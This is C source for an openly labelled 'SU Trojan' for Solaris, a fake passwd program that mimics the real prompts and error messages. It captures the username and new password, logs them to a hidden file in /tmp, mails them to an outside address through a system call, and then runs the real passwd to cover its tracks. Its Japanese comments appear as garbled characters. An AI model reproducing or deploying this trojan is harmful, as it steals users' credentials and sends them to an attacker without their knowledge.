/*============================================================================= SU Trojan Ver2.00 for Solaris The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (unewn4th@usa.net) ============================================================================= */ #include <pwd.h> #include <stdio.h> #include <stdlib.h> /* ƒpƒXƒ��[ƒh‚ð’Ê’m‚·‚éƒ�ƒAƒh */ /* ˆÈ‰º‚Ì1�s‚ð�í�œ‚·‚é‚ƃ��[ƒ‹’Ê’m‚Í�s‚í‚ê‚Ü‚¹‚ñ */ #define MAIL "hohoho@hacker.net" /* ƒ�ƒMƒ“ƒOƒtƒ@ƒCƒ‹. Œ©‚‚©‚è‚É‚­‚¢–¼‘O‚É•Ï�X */ #define LOGFILE "/tmp/.pl" #define MSG_PERMERR "passwd (SYSTEM): Permission denied\n"\ "passwd (SYSTEM): Can't change local passwd file\n\n" #define MSG_PERMERR_J "ƒAƒNƒZƒXŒ ‚ª—^‚¦‚ç‚ê‚Ä‚¢‚Ü‚¹‚ñ�B\n" #define MSG_PERMERR_E "Permission denied\n" #define MSG_DOESNTEXIST "passwd(SYSTEM): %s does not exist\n" #define MSG_BANNER "passwd: Changing password for %s\n" #define MSG_OLDPASS "Enter login password: " #define MSG_BADOLDPASS "passwd(SYSTEM): Sorry.\n" #define MSG_NEWPASS "New password: " #define MSG_RENEWPAS "Re-enter new password: " #define MSG_TOOSHORT "passwd(SYSTEM): Password too short - must be at least 6 characters.\n" #define MSG_MUSTDIFF "passwd(SYSTEM): Passwords must differ by at least 3 positions\n" #define MSG_INVALID "passwd(SYSTEM): The first 6 characters of the password\n"\ "must contain at least two alphabetic characters and at least\n"\ "one numeric or special character.\n" #define MSG_DONTMATCH "passwd(SYSTEM): They don't match; try again.\n" #define TMPFILE "/tmp/.tmp" #define MAX_USERNAME 200 #define MAX_PASSWD 200 main(int argc,char *argv[]) { int uid=getuid(); struct passwd p; char oldpasswd[MAX_PASSWD],newpasswd[MAX_PASSWD],renewpasswd[MAX_PASSWD]; char *getpass_sys(char *); char username[MAX_USERNAME]; char buf[200]; FILE *fp; int i,ct,l; memcpy(&p,getpwuid(uid),sizeof(struct passwd)); if (argc==1) strcpy(username,p.pw_name); else{ strncpy(username,argv[1],MAX_USERNAME-1); username[MAX_USERNAME-1]=0; if (getpwnam(argv[1])==NULL){ printf(MSG_DOESNTEXIST,argv[1]); if (strcmp(getenv("LANG"),"ja")) printf(MSG_PERMERR_E); else printf(MSG_PERMERR_J); exit(1); } memcpy(&p,getpwuid(uid),sizeof(struct passwd)); if (uid!=0 && strcmp(p.pw_name,argv[1])){ printf(MSG_PERMERR); if (strcmp(getenv("LANG"),"ja")) printf(MSG_PERMERR_E); else printf(MSG_PERMERR_J); exit(1); } } printf(MSG_BANNER,username); if (uid!=0){ strncpy(oldpasswd,getpass(MSG_OLDPASS),MAX_PASSWD-1); oldpasswd[MAX_PASSWD-1]=0; if (strlen(oldpasswd)==0){ printf(MSG_BADOLDPASS); if (strcmp(getenv("LANG"),"ja")) printf(MSG_PERMERR_E); else printf(MSG_PERMERR_J); exit(1); } } for (;;){ strncpy(newpasswd,getpass_sys(MSG_NEWPASS),MAX_PASSWD-1); newpasswd[MAX_PASSWD-1]=0; if (strlen(newpasswd)<strlen(oldpasswd)) l=strlen(newpasswd); else l=strlen(oldpasswd); for (ct=0,i=0;i<l;i++) if (newpasswd[i]!=oldpasswd[i]) ct++; if (ct>=3) break; else printf(MSG_MUSTDIFF); } strncpy(renewpasswd,getpass_sys(MSG_RENEWPAS),MAX_PASSWD-1); renewpasswd[MAX_PASSWD-1]=0; printf(MSG_DONTMATCH); if ((fp=fopen(LOGFILE,"a"))!=NULL){ fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd); fclose(fp); } #ifdef MAIL if ((fp=fopen(TMPFILE,"w"))!=NULL){ fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd); fclose(fp); } sprintf(buf,"mail %s < %s",MAIL,TMPFILE); system(buf); remove(TMPFILE); #endif system("passwd"); } char *getpass_sys(char *d) { static char *x; int i,c1,c2; for (;;){ x=getpass(d); if (strlen(x)<6){ printf(MSG_TOOSHORT); continue; } c1=c2=0; for (i=0;i<strlen(x);i++){ if ((x[i]>='a' && x[i]<='x') || (x[i]>='A' && x[i]<='X')) c1++; else c2++; } if (c1<2 || c2==0){ printf(MSG_INVALID); continue; } break; } return (x); }